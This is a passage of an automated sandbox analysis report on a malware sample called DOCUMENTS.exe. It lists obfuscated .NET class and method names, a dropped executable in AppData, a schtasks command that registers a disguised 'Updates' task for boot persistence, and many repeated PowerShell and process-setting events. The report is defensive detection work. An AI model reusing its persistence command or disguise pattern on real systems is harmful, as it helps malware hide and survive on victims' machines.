                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, xmOcDpHNNX8lBExIDd.csHigh entropy of concatenated method names: 'oILLWGWEo1', 'wNuL8E7RuY', 'iCXEM6uoBy', 'js0EPxXMLM', 'SLTE5Om7NR', 'TZrEdVJMmQ', 'L4ZEhsOZiK', 'VTwENcTx20', 'OD8E6krOgJ', 'iFsEqBK5jT'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, iHtn2JKYOqRtpcQHmC.csHigh entropy of concatenated method names: 'Pvy3YKDuJl', 'nay3QI5QEo', 'BlFKUlLBQT', 'f7KKRBsIqJ', 'V4W3lLcmZq', 'A333oJkRbd', 'SQG37OSIIf', 'rB43TEF6vI', 'KrD3ONM7Wb', 'tCV3J3KQvf'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, dpJ4X47JnBRnja5sBA.csHigh entropy of concatenated method names: 'FQ8Ktt1Gg2', 'aKVKSaWkey', 'bZAKEowFvP', 'dHBKL74V1A', 'E3kKytTypC', 'QZjKgpuasS', 'UAGKXge7EN', 'FIYKryV22a', 'CynKbVbGCo', 'QkdKntVNhy'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, qWCsH5q5S6cIyfTUWn.csHigh entropy of concatenated method names: 'UVQExdQmri', 'P3IE2tpuIP', 'j2ZEmokpas', 'PbyEHZwXOk', 'klNEipkch0', 'DptEepxruU', 'kHME3YgdaQ', 'HO7EKK0Ycu', 'hewEVsIA6L', 'FQuEDLnh3m'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, itavA5064CpfMkCRx8.csHigh entropy of concatenated method names: 'Dispose', 'gi6Rp0gVot', 'yjpF0ggf9a', 'qCtff7xLHB', 'y3URQILg6c', 'Nt7RzIaZei', 'ProcessDialogKey', 'lTXFUploL3', 'APxFRHvtNd', 'T0YFFYFkID'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, c6Xl83zSDdmAH1RGoD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'se1VaI6HHE', 'NkwVitp3v5', 'ursVeXhB4e', 'c0FV34xfSm', 'bZ0VKTRwAU', 'uNOVV0XcEt', 'VRbVDQvcj7'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, oDEPGtaZ6ry5IcnYBf.csHigh entropy of concatenated method names: 'XTYST6Bi8d', 'uYnSOnJgNW', 'sM7SJGRQE5', 'b2UScV4tH3', 'jKASuYpDB5', 'fZrSI1U1hm', 'cllSsG54jD', 'uTeSYOQn4n', 'xn1Spus5Au', 'eDLSQcubdD'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, oPRCmrAx6DKALUJu4K.csHigh entropy of concatenated method names: 'VVM3bts0gv', 'AFK3n1jdty', 'ToString', 'TZS3tmAhSh', 'Kxg3SN47hj', 'Uft3EyXyrm', 'OC43LclFFu', 'iGc3yDhDFi', 'O103gG5h8k', 'qjL3XsutDx'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, ElQsm1Z1Vvnmg6hSYw.csHigh entropy of concatenated method names: 'X0DiqM2aLG', 'g31iortRwN', 'm26iTjCNLF', 'rnciOrSAUJ', 'U9Di0wamhe', 'fM2iMZ9l5i', 'sgJiPryiwT', 'CN5i5hlvhm', 'Q5bid2FYg6', 'QyBihETmpL'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, abfOueY15F0v0aZ5JmG.csHigh entropy of concatenated method names: 'lwZVCfS2OT', 'OECVGXBxxL', 'krXVkkkCDl', 'zyPVxXtVvd', 'aB1VWBODg1', 'YkpV2ruoh0', 'mMZV8OMvEF', 'UEcVm3Uf88', 'v4ZVHbbjnL', 'j74V1xDTA8'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, Q2fehlnnO9kNBjg725.csHigh entropy of concatenated method names: 'O4GamZBUsB', 'cKqaHwf9Hd', 'KyYavLSZnb', 'XCEa0GciGK', 'lsAaPUoJih', 'i15a5vJIOa', 'zvcahihFdc', 'a48aNj5E40', 'NMxaqa3AhH', 'Qnial6iTMt'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, Cu0XhNdbCSE50TeKpT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oOMFpy2IfL', 'FXgFQCl15K', 'CwKFzvCgKU', 'yin9UKlrAJ', 'ReA9RrEu5l', 'rcH9Flbx58', 'tdN9952IZ0', 'SiwYcmx2TF9FEseluVx'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, mb0GRbFFLjLV5BDW7f.csHigh entropy of concatenated method names: 'gnGyw7L2ty', 'R0jySKNs9L', 'NAWyLhtc1H', 'KOCyg1lAUi', 'U8gyXMsqCk', 'ITuLuSFlxs', 'krNLIE7ggF', 'tYRLsdWeDb', 'PlILYXA3kF', 'sAoLps2DXp'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, aQ22UkNAfMBbqUNii2.csHigh entropy of concatenated method names: 'sJ5kNkWDG', 'ReaxGqukX', 'gkN25xnvL', 'wqe8NU86G', 'IoaHmvWnD', 'Ocy1rI95f', 'RRkTKk8d94ouZ1j2LQ', 'woANyjbUl0LpOaC0U3', 'SkfKOdafs', 'otPDMpxi2'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, ySxHLLb1AFMFrZukA4.csHigh entropy of concatenated method names: 'fSlgthrAZC', 'aXBgEjAAmn', 'Xfegypu0kV', 'rP3yQJvTta', 'PGYyzUorG0', 'v8ggUAs43q', 'kMdgRA0fOj', 'BclgFJNhaj', 'rUng9i6LZs', 'RsegZ811Ad'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
